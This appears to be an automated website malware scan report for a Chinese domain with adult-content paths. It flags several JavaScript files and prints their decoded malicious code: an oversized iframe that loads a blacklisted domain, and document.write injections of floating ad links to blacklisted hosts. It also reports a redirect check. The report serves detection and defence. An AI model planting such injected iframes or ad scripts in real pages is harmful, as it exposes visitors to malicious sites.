Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=www528333.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www528333.com/ | 200 OK Content-Length: 4674 Content-Type: text/html | clean |
http://www528333.com/js/jm.js | 200 OK Content-Length: 4789 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: p.cntaisun.com Decoded script: <iframe src="http://p.cntaisun.com" width="100%" height="2000" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no" runat="server" allowtransparency="yes"></iframe> | ||
http://www528333.com/js/dl.js | 200 OK Content-Length: 3509 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: cnrdn.com ...[1055 bytes skipped]... ment.writeln("<style type=\"text\/css\">"); document.writeln("#leftDiv,#rightDiv{position:absolute;}"); document.writeln(".itemFloat{height:auto;line-height:8px}"); document.writeln("<\/style>"); document.writeln("<div id=\"leftDiv\" align=\"left\" style=\"top:50px;left:5px\">"); document.writeln("<div id=\"left2\" class=\"itemFloat\">"); document.writeln("<a target=_blank href=http://cnrdn.com/01kE><img border=0 width=\"178\" height=\"284\" src=/x.jpg></a>"); document.writeln("<br><a href=\"javascript:close_left2();\">关闭<\/a>"); document.writeln("<\/div>"); document.writeln("<\/div>"); document.writeln("<div id=\"rightDiv\" align=\"right\" style=\"top:50px;right:5px\">"); document.writeln("<div id=\"right2\" class=\"itemFloat\">"); document.writeln("<a target=_blank href=http ...[1502 bytes skipped]... Decoded script: heartBeat() heartBeat() /*** called setInterval with heartBeat(), 1 */ <style type="text/css"> #leftDiv,#rightDiv{position:absolute;} .itemFloat{height:auto;line-height:8px} </style> <div id="leftDiv" align="left" style="top:50px;left:5px"> <div id="left2" class="itemFloat"> <a target=_blank href=http://cnrdn.com/01kE><img border=0 width="178" height="284" src=/x.jpg></a> <br><a href="javascript:close_left2();">关闭</a> </div> </div> <div id="rightDiv" align="right" style="top:50px;right:5px"> <div id="right2" class="itemFloat"> <a target=_blank href=http://cnrdn.com/01kE><img border=0 width="178" height="284" src=/s.jpg></a> <br><a href= ...[85 bytes skipped]... | ||
http://www528333.com/js/url.js | 200 OK Content-Length: 1120 Content-Type: application/javascript | clean |
http://www528333.com/js/ad-ding.js | 200 OK Content-Length: 149 Content-Type: application/javascript | clean |
http://www528333.com/js/3t.js | 200 OK Content-Length: 588 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write("<a href=\"http:///jump.html\" target=\"_blank\"><img src=http://drmcmm.baidu.com/media/id=nHndn1cdPW0z&gp=401&time=nHnvP1Rvn1TdPf.gif width=\"884\" height=\"90\" border=0></a>");
document.write("<a href=\"http:///jump.html\" target=\"_blank\"><img src=http://drmcmm.baidu.com/media/id=nHnLrHnznHRL&gp=401&time=nHnvrjR1rHmdnf.gif width=\"884\" height=\"80\" border=0></a>"); document.write("<a href=\"http:///jump.html\" target=\"_blank\"><img src=http://drmcmm.baidu.com/media/id=nHnLrHnkPHnv&gp=401&time=nHnvrjR1rHDvn6.gif width=\"884\" height=\"80\" border=0></a>"); Antivirus reports:
| ||
http://www528333.com/js/tj.js | 200 OK Content-Length: 128 Content-Type: application/javascript | clean |
http://www528333.com/a/zptp/ | 200 OK Content-Length: 17390 Content-Type: text/html | clean |
http://www528333.com/a/xiaoyuanchunse/ | 200 OK Content-Length: 18744 Content-Type: text/html | clean |
http://www528333.com/a/xingaijiqiao/ | 200 OK Content-Length: 19422 Content-Type: text/html | clean |
http://www528333.com/a/fengsaoshunv/ | 200 OK Content-Length: 19351 Content-Type: text/html | clean |
http://www528333.com/a/fengliuchunse/ | 200 OK Content-Length: 19349 Content-Type: text/html | clean |
http://www528333.com/a/ribennvyou/ | 200 OK Content-Length: 16288 Content-Type: text/html | clean |
http://www528333.com/a/oumeimengpian/ | 200 OK Content-Length: 19369 Content-Type: text/html | clean |
http://www528333.com/a/yanzhaozipai/ | 200 OK Content-Length: 19335 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: www528333.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 13:33:35 GMT
Accept-Ranges: bytes
ETag: "1e5a97-1242-50be887aaf700"
Server: Apache
Vary: Accept-Encoding
Content-Length: 4674
Content-Type: text/html
Last-Modified: Mon, 05 Jan 2015 14:30:20 GMT
...4674 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: www528333.com
Referer: http://www.google.com/search?q=www528333.com
Result:
The result is similar to the first query. There are no suspicious redirects found.